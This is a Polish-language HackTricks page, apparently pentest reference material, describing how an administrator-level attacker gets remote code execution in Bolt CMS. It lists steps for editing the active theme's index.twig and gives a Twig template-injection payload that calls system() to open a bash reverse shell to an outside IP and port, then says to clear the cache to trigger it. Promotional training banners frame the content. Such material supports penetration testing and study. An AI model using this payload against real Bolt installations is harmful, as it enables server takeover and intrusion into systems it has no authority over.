Bolt CMS

Tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks

• Sprawdź plany subskrypcyjne!
• Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
• Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

RCE

Po zalogowaniu się jako administrator (przejdź do /bot, aby uzyskać dostęp do ekranu logowania), możesz uzyskać RCE w Bolt CMS:

• Wybierz Configuration -> View Configuration -> Main Configuration lub przejdź do ścieżki URL /bolt/file-edit/config?file=/bolt/config.yaml
• Sprawdź wartość motywu

• Wybierz File management -> View & edit templates
• Wybierz bazowy motyw znaleziony w poprzednim kroku (base-2021 w tym przypadku) i wybierz index.twig
• W moim przypadku znajduje się to w ścieżce URL /bolt/file-edit/themes?file=/base-2021/index.twig
• Ustaw swój ładunek w tym pliku za pomocą template injection (Twig), na przykład: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
• I zapisz zmiany

• Wyczyść pamięć podręczną w Maintenance -> Clear the cache
• Ponownie uzyskaj dostęp do strony jako zwykły użytkownik, a ładunek powinien zostać wykonany

Tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks

• Sprawdź plany subskrypcyjne!
• Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
• Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.